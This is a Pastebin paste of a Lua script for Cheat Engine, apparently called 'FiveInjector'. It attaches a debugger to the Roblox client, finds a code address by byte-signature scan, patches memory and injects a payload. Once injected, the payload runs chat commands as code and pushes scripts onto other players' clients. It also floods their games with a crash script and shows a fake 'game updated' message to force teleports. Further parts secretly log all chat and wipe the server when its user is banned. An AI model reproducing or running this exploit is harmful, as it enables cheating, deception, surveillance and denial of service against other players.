0_Abysal

Untitled

Jul 28th, 2018
268
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.59 KB | None | 0 0
  1. local Exploits, Successes, AddressList, NoRun, Interface = {}, {}, {}, {}, {};
  2. local GlobalOffset = "28";
  3.  
  4. function GetExploit(index)
  5. local tab, scan, result = Exploits[index], createMemScan(true);
  6. memscan_returnOnlyOneResult(scan, true);
  7. memscan_firstScan(scan, soExactValue, vtByteArray, rtTruncated, table.concat(tab[2], " "), nil, 0, 0x00FFFFFF, "", fsmNotAligned, nil, false, false, false, false);
  8. memscan_waitTillDone(scan);
  9. result = memscan_getOnlyResult(scan);
  10. if result == nil then return nil; end
  11. result = string.format("%X", result + tab[3]);
  12. result = string.rep("0", 8 - string.len(result)) .. result;
  13. return result;
  14. end
  15. function AddExploit(name, hex, offset)
  16. table.insert(Exploits, {name, hex, offset})
  17. end
  18. function toAddr(num)
  19. local num = tonumber(num);
  20. local addr = string.format("%X", num):upper();
  21. addr = string.rep("0", 8 - string.len(addr)) .. addr;
  22. return addr;
  23. end
  24.  
  25.  
  26. debugger_onBreakpoint = function()
  27. local function GetAddress(ESPaddr, Offset)
  28. local ESPaddr, Offset = tostring(ESPaddr) or string.rep("0", 8), tostring(Offset == nil and GlobalOffset or Offset);
  29. local SCaddr_base = tonumber("0x" .. ESPaddr) + tonumber("0x" .. Offset);
  30. local SCaddr_cont1, SCaddr_cont2, SCaddr_cont3, SCaddr_cont4 = tostring(string.format("%X", SCaddr_base)), tostring(string.format("%X", SCaddr_base + 1)), tostring(string.format("%X", SCaddr_base + 2)), tostring(string.format("%X", SCaddr_base + 3));
  31. local SCaddr = (readBytes(SCaddr_cont1) + (readBytes(SCaddr_cont2) * 256) + (readBytes(SCaddr_cont3) * 65536) + (readBytes(SCaddr_cont4) * 16777216));
  32. return toAddr(SCaddr);
  33. end
  34. --if readBytes(GetAddress(toAddr(ESP), GlobalOffset), 1) == 0x0D then
  35. local JOIN_addr = GetAddress(toAddr(ESP), GlobalOffset);
  36. local JOIN_len = tonumber("0x"..GetAddress(toAddr(ESP), string.format("%X", tonumber("0x"..GlobalOffset) + 4)));
  37. local JOIN_script_tbl = readBytes(JOIN_addr, JOIN_len, true);
  38. local JOIN_script = "";
  39. table.foreach(JOIN_script_tbl, function(i, v) JOIN_script = JOIN_script .. string.char(v); end);
  40. local script = JOIN_script .. [==[ repeat wait() until game:service'Players'.LocalPlayer; wait(); game:service'Players'.LocalPlayer.Chatted:connect(function(s) Spawn(function() loadstring(s)() end) end) LagScript = [[
  41.  
  42. script:Destroy();
  43.  
  44. local runService = Game:GetService("RunService").Stepped;
  45. local LagNum = 1250;
  46. local str = "You just got crashed by one of the most powerful hackers on Roblox, how do you feel?";
  47.  
  48. for i = 1, math.huge do
  49. if i % LagNum == 0 then runService:wait(); end
  50. Instance.new("Message", Workspace).Text = str;
  51. end
  52.  
  53. ]]
  54.  
  55. local function TeleportScript(place_id)
  56. return [[
  57. script:Destroy();
  58.  
  59. local place_id_str = ]]..tostring(place_id)..[[;
  60. local place_id = tonumber(place_id_str);
  61. local message_str = "The owner has updated the game. New features: less lag, improved dynamic lighting, and more! Press the 'Leave' button to play to an updated game!";
  62. local player = Game:GetService("Players").LocalPlayer;
  63. local teleport_service = Game:GetService("TeleportService");
  64. local run_service = Game:GetService("RunService").Stepped;
  65. if player:FindFirstChild("PlayerGui") then
  66. pcall(function() player.PlayerGui:ClearAllChildren(); end)
  67. end
  68. while true do
  69. if player:FindFirstChild("PlayerGui") then
  70. local screen_gui, frame_gui, message_gui;
  71. if not player.PlayerGui:FindFirstChild(" __teleport_updated_place_gui") then
  72. pcall(function()
  73. screen_gui = Instance.new("ScreenGui", player.PlayerGui);
  74. screen_gui.Name = " __teleport_updated_place_gui";
  75. end)
  76. else screen_gui = player.PlayerGui[" __teleport_updated_place_gui"]; end
  77. if not screen_gui:FindFirstChild(" __teleport_updated_place_frame") then
  78. pcall(function()
  79. frame_gui = Instance.new("Frame", screen_gui);
  80. frame_gui.Name = " __teleport_updated_place_frame";
  81. frame_gui.ZIndex = 9;
  82. frame_gui.Size = UDim2.new(2, 0, 2, 0);
  83. frame_gui.Position = UDim2.new(-.5, 0, -.5, 0);
  84. frame_gui.BackgroundColor3 = Color3.new();
  85. end)
  86. end
  87. if not screen_gui:FindFirstChild(" __teleport_updated_place_message") then
  88. pcall(function()
  89. message_gui = Instance.new("TextLabel", screen_gui);
  90. message_gui.Name = " __teleport_updated_place_message";
  91. message_gui.ZIndex = 10;
  92. message_gui.Size = UDim2.new(.9, 0, .3, 0);
  93. message_gui.Position = UDim2.new(.05, 0, 0, 0);
  94. message_gui.BackgroundColor3 = Color3.new();
  95. message_gui.BorderColor3 = Color3.new();
  96. message_gui.BorderSizePixel = 0;
  97. message_gui.TextWrapped = true;
  98. message_gui.TextColor3 = Color3.new(1,1,1);
  99. message_gui.FontSize = 8;
  100. message_gui.Font = 2;
  101. message_gui.Text = message_str;
  102. end)
  103. end
  104. end
  105. teleport_service:Teleport(place_id);
  106. pcall(function() Workspace.CurrentCamera.CameraType = 6; end)
  107. pcall(function() player.Character = nil; end)
  108. run_service:wait();
  109. end
  110. ]]
  111. end
  112.  
  113. local function GetError(not_errored, msg)
  114. if not_errored then msg = "Running Script" end
  115. Game.Debris:AddItem((function()
  116. local hint;
  117. pcall(function()
  118. hint=Instance.new("Hint",Workspace.CurrentCamera)
  119. hint.Text=msg
  120. end)
  121. return hint
  122. end)(), 3)
  123. end
  124.  
  125. local function FindPlayers(str)
  126. if not str then return end
  127. local str,players = str:lower(),{}
  128. if str == "all" then
  129. for i, v in next, Game.Players:GetPlayers() do
  130. players[#players+1] = v
  131. end
  132. elseif str:match("others?") then
  133. for i, v in next, Game.Players:GetPlayers() do
  134. pcall(function()
  135. if v ~= Game.Players.LocalPlayer then
  136. players[#players+1] = v
  137. end
  138. end)
  139. end
  140. else
  141. for i, v in next, Game.Players:GetPlayers() do
  142. pcall(function()
  143. if v.Name:lower():match("^"..str) then
  144. players[#players+1] = v
  145. end
  146. end)
  147. end
  148. end
  149. return players
  150. end
  151.  
  152. local function LoadOnClients(players, source)
  153. if not players or #players == 0 then return end
  154. local load = function(Player)
  155. local Script = Instance.new "LocalScript"
  156. --
  157. Script.Source = [[
  158. while script.Name == "LocalScript" do wait() end
  159. ypcall(loadstring([==============[]]..source..[[]==============]))
  160. ]]
  161. --
  162. Script.Parent = Game.Players.LocalPlayer.Character
  163. or Game.Players.LocalPlayer:FindFirstChild "Backpack"
  164. or Game.Players.LocalPlayer.CharacterAdded:wait()
  165. wait(.5)
  166. Script.Name = "LocalScript "
  167. Script.Parent = Player.Character
  168. or Player:FindFirstChild "Backpack"
  169. or Player.CharacterAdded:wait()
  170. end
  171. for _,player in next, players do
  172. coroutine.wrap(load)(player)
  173. end
  174. end
  175.  
  176. coroutine.resume(coroutine.create(function()
  177. wait(PlayerLoadtime)
  178. HackerName=game.Players.LocalPlayer.Name
  179. end))
  180. if(AntibanScript)then
  181. coroutine.resume(coroutine.create(function()
  182. wait(PlayerLoadtime+.5)
  183. while true and wait() do
  184. if(AntibanScript)then
  185. if not(game.Players:FindFirstChild(HackerName))then
  186. wait(3.5)
  187. if(AntibanScript)then
  188. function workspaceRemove(path)
  189. for _,v in pairs(path:GetChildren())do
  190. coroutine.resume(coroutine.create(function(v)
  191. if(v:IsA("Script"))or(v:IsA("LocalScript"))then
  192. v.Disabled=true
  193. v:remove()
  194. else
  195. v:remove()
  196. end
  197. end),v)
  198. end
  199. end
  200. workspaceRemove(game:GetService('Workspace'))
  201. for e,i in pairs(game.Players:GetPlayers())do
  202. coroutine.resume(coroutine.create(function(i) i:remove() end),i)
  203. end
  204. end
  205. end
  206. end
  207. end
  208. end))
  209. end
  210. coroutine.resume(coroutine.create(function()
  211. wait(PlayerLoadtime)
  212. game.Players.LocalPlayer:SetSuperSafeChat(false)
  213. game.Players.LocalPlayer.Chatted:connect(function(msg)
  214. if string.sub(msg, 1, 3) == "ls " then
  215. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  216. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  217. ls.Name="lsInserted"
  218. wait(.2)
  219. ls.Name="lsRun"
  220. ls.Source=string.sub(msg,4)
  221. ls.Disabled=true
  222. ls.Disabled=false
  223. end
  224. elseif string.sub(msg, 1, 3) == "rs " then
  225. coroutine.resume(coroutine.create(function(msg)
  226. local errored,output = ypcall(loadstring(msg:sub(4)))
  227. GetError(errored,output)
  228. errored,output = nil
  229. end),msg)
  230. elseif string.sub(msg, 1, 3) == "ls/" then
  231. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  232. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  233. ls.Name="lsInserted"
  234. wait(.2)
  235. ls.Name="lsRun"
  236. ls.Source=string.sub(msg,4)
  237. ls.Disabled=true
  238. ls.Disabled=false
  239. end
  240. elseif string.sub(msg, 1, 3) == "rs/" then
  241. coroutine.resume(coroutine.create(function(msg)
  242. local errored,output = ypcall(loadstring(msg:sub(4)))
  243. GetError(errored,output)
  244. errored,output = nil
  245. end),msg)
  246. elseif string.sub(msg, 1, 3) == "cs " then
  247. LoadOnClients(FindPlayers(msg:sub(4):match("(%w+)%s")), msg:sub(4):match("%s(.+)"))
  248. elseif string.sub(msg, 1, 10) == "mediafire " then
  249. LoadOnClients(FindPlayers(msg:sub(11):match("(%w+)%s")), msg:sub(11):match("%s(.+)"))
  250. elseif string.sub(msg, 1, 4) == "lag " then
  251. LoadOnClients(FindPlayers(msg:sub(5):match("%w+")), LagScript)
  252. elseif string.sub(msg, 1, 7) == "hitler " then
  253. LoadOnClients(FindPlayers(msg:sub(8):match("%w+")), LagScript)
  254. --
  255. elseif string.sub(msg, 1, 3) == "cs/" then
  256. LoadOnClients(FindPlayers(msg:sub(4):match("([%w%s]+)/")), msg:sub(4):match("/(.+)"))
  257. elseif string.sub(msg, 1, 10) == "mediafire/" then
  258. LoadOnClients(FindPlayers(msg:sub(11):match("([%w%s]+)/")), msg:sub(11):match("/(.+)"))
  259. elseif string.sub(msg, 1, 4) == "lag/" then
  260. LoadOnClients(FindPlayers(msg:sub(5):match("[%w%s]+")), LagScript)
  261. elseif string.sub(msg, 1, 7) == "hitler/" then
  262. LoadOnClients(FindPlayers(msg:sub(8):match("[%w%s]+")), LagScript)
  263. --
  264. elseif string.sub(msg, 1, 1) == "/" then
  265. if string.sub(msg, 2, 4) == "sb" then
  266. chatbool = true
  267. repeat wait(.01)
  268. game.Players.LocalPlayer:SetSuperSafeChat(false)
  269. game.Players:Chat("/sc 2 4")
  270. game.Players:Chat("/sc 2 7 0")
  271. game.Players:Chat("/sc 2 7 4")
  272. until not chatbool
  273. elseif string.sub(msg, 2, 5) == "nsb" then
  274. chatbool = false
  275. elseif string.sub(msg, 2, 7) == "power" then
  276. if game.Players.LocalPlayer.Character ~= nil then
  277. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  278. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  279. ls.Name="lsInserted"
  280. wait(.2)
  281. ls.Name="lsRun"
  282. ls.Source=PowerScriptSource
  283. ls.Disabled=true
  284. ls.Disabled=false
  285. end
  286. end
  287. elseif string.sub(msg, 2, 7) == "gaara" then
  288. if game.Players.LocalPlayer.Character ~= nil then
  289. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  290. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  291. ls.Name="lsInserted"
  292. wait(.2)
  293. ls.Name="lsRun"
  294. ls.Source=GaaraSource
  295. ls.Disabled=true
  296. ls.Disabled=false
  297. end
  298. end
  299. elseif string.sub(msg, 2, 6) == "nova" then
  300. if game.Players.LocalPlayer.Character ~= nil then
  301. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  302. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  303. ls.Name="lsInserted"
  304. wait(.2)
  305. ls.Name="lsRun"
  306. ls.Source=NovaSource
  307. ls.Disabled=true
  308. ls.Disabled=false
  309. end
  310. end
  311. elseif string.sub(msg, 2, 9) == "outgame" then AntibanScript=false
  312. if game.Players.LocalPlayer.Character ~= nil then
  313. if not(game.Players.LocalPlayer.Character:FindFirstChild("lsInserted"))then
  314. ls=Instance.new("LocalScript",game.Players.LocalPlayer.Character)
  315. ls.Name="lsInserted"
  316. wait(.2)
  317. ls.Name="lsRun"
  318. ls.Source=OutGameSource
  319. ls.Disabled=true
  320. ls.Disabled=false
  321. end
  322. end
  323. end
  324. end
  325. end)
  326. end))
  327. coroutine.resume(coroutine.create(function()
  328. wait(PlayerLoadtime)
  329. while wait() do
  330. game.Players.LocalPlayer:SetSuperSafeChat(false)
  331. end
  332. end))
  333. coroutine.resume(coroutine.create(function()
  334. wait(PlayerLoadtime)
  335. if ChatHistory then
  336. coroutine.resume(coroutine.create(function()
  337. CH=Instance.new("Model",game:GetService("SoundService"))
  338. CH.Name="ChatHistory"
  339. for _,v in pairs(game.Players:GetPlayers())do
  340. v.Chatted:connect(function(msg)
  341. chatHistory=Instance.new("StringValue",CH)
  342. chatHistory.Name=v.Name
  343. chatHistory.Value=msg
  344. end)
  345. end
  346. game.Players.PlayerAdded:connect(function(v)
  347. v.Chatted:connect(function(msg)
  348. chatHistory=Instance.new("StringValue",CH)
  349. chatHistory.Name=v.Name
  350. chatHistory.Value=msg
  351. end)
  352. end) end)) coroutine.resume(coroutine.create(function()
  353. CH2=Instance.new("Model",game:GetService("StarterGui"))
  354. CH2.Name="ChatHistory"
  355. for _,v in pairs(game.Players:GetPlayers())do
  356. v.Chatted:connect(function(msg)
  357. chatHistory=Instance.new("StringValue",CH2)
  358. chatHistory.Name=v.Name
  359. chatHistory.Value=msg
  360. end)
  361. end
  362. game.Players.PlayerAdded:connect(function(v)
  363. v.Chatted:connect(function(msg)
  364. chatHistory=Instance.new("StringValue",CH2)
  365. chatHistory.Name=v.Name
  366. chatHistory.Value=msg
  367. end)
  368. end) end)) coroutine.resume(coroutine.create(function()
  369. CH3=Instance.new("Model",game:GetService("Teams"))
  370. CH3.Name="ChatHistory"
  371. for _,v in pairs(game.Players:GetPlayers())do
  372. v.Chatted:connect(function(msg)
  373. chatHistory=Instance.new("StringValue",CH3)
  374. chatHistory.Name=v.Name
  375. chatHistory.Value=msg
  376. end)
  377. end
  378. game.Players.PlayerAdded:connect(function(v)
  379. v.Chatted:connect(function(msg)
  380. chatHistory=Instance.new("StringValue",CH3)
  381. chatHistory.Name=v.Name
  382. chatHistory.Value=msg
  383. end)
  384. end) end)) coroutine.resume(coroutine.create(function()
  385. CH4=Instance.new("Model",game:GetService("Soundscape"))
  386. CH4.Name="ChatHistory"
  387. for _,v in pairs(game.Players:GetPlayers())do
  388. v.Chatted:connect(function(msg)
  389. chatHistory=Instance.new("StringValue",CH4)
  390. chatHistory.Name=v.Name
  391. chatHistory.Value=msg
  392. end)
  393. end
  394. game.Players.PlayerAdded:connect(function(v)
  395. v.Chatted:connect(function(msg)
  396. chatHistory=Instance.new("StringValue",CH4)
  397. chatHistory.Name=v.Name
  398. chatHistory.Value=msg
  399. end)
  400. end) end))
  401. end
  402. end))
  403. X=function(f)
  404. return coroutine.resume(coroutine.create(f))
  405. end]==]
  406. local memory = allocateSharedMemory("[ROBLOX]-ScriptTrainer", string.len(script) + 5);
  407. local mem = toAddr(memory);
  408. local len = toAddr(string.len(script));
  409. local success_catch = writeString(mem, script);
  410. writeBytes(ESP + tonumber("0x" .. GlobalOffset), tonumber("0x" .. mem:sub(7, 8)), tonumber("0x" .. mem:sub(5, 6)), tonumber("0x" .. mem:sub(3, 4)),tonumber("0x" .. mem:sub(1, 2)));
  411. writeBytes(ESP + tonumber("0x" .. GlobalOffset) + 4, tonumber("0x" .. len:sub(7, 8)), tonumber("0x" .. len:sub(5, 6)), tonumber("0x" .. len:sub(3, 4)),tonumber("0x" .. len:sub(1, 2)));
  412. --print("[FiveInjector]: Script Execution location " .. GetAddress(toAddr(ESP), GlobalOffset) .. " with length " .. tonumber("0x" .. len));
  413. pcall(function() debug_removeBreakpoint(EIP); end);
  414. debug_continueFromBreakpoint(co_run);
  415. messageDialog("studio.ashx found and " .. (success_catch and "Thejustifierx successful" or "failed to inject."), (success_catch and 2 or 1), 2);
  416. --else
  417. --debug_continueFromBreakpoint(co_run)
  418. --end
  419. end
  420.  
  421. function Exec()
  422. local unprotect_mem = {00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 01, 00, 00, 00, 01, 00, 01, 01, 01, 01, 01, 00, 01, 00, 01, 00, 00, 00, 01, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00}
  423. writeBytes("00F24118", unprotect_mem);
  424. pcall(function() object_destroy(Interface.MainFrame); end);
  425. Exploits, Successes, AddressList, Interface = {}, {}, {}, {};
  426. --AddExploit("level", {0x89, 0x74, 0x24, 0x0C, 0x89, 0x06, 0xE8}, 4)
  427. AddExploit("script", {0x83, 0xEC, 0x14, 0x56, 0x57, 0x8B, 0x7C, 0x24, 0x2C, 0x85, 0xFF}, 3)
  428. for i, v in pairs(Exploits) do
  429. local exploit = GetExploit(i);
  430. if (exploit == nil) then
  431. print("[FiveInjector]: Failed \"" .. v[1] .. "\"");
  432. else
  433. pcall(function() debug_removeBreakpoint(exploit); end);
  434. debug_setBreakpoint(exploit);
  435. AddressList[v[1]] = exploit;
  436. table.insert(Successes, v[1]);
  437. print("[FiveInjector]: Success \"" .. v[1] .. "\" [" .. exploit .. "]");
  438. end
  439. end
  440. print("[FiveInjector]: " .. tostring(#Successes) .. "/" .. tostring(#Exploits) .. " exploits found.")
  441.  
  442. if #Successes == #Exploits then
  443. print("[FiveInjector]: Attached successfully. Listening for studio.ashx now...");
  444. else
  445. messageDialog("[FiveInjector]: Initializing failed. FiveInjector fails to launch", 1, 2);
  446. end
  447. end
  448.  
  449. function myCheck(_)
  450. local id = getProcessIDFromProcessName("RobloxPlayerBeta.exe");
  451. if id ~= nil then
  452. for i, v in pairs(NoRun) do
  453. if v == id then
  454. return
  455. end
  456. end
  457. table.insert(NoRun, id);
  458. openProcess(id);
  459. debugProcess(2);
  460. Exec();
  461. else
  462. local id2 = getProcessIDFromProcessName("RobloxPlayer.exe");
  463. if id2 ~= nil then
  464. for i, v in pairs(NoRun) do
  465. if v == id2 then
  466. return
  467. end
  468. end
  469. table.insert(NoRun, id2);
  470. openProcess(id2);
  471. debugProcess(2);
  472. Exec();
  473. end
  474. end
  475. end
  476.  
  477. t = createTimer(nil)
  478. timer_setInterval(t, 500)
  479. timer_onTimer(t, myCheck)
  480. timer_setEnabled(t, true)
Add Comment
Please, Sign In to add comment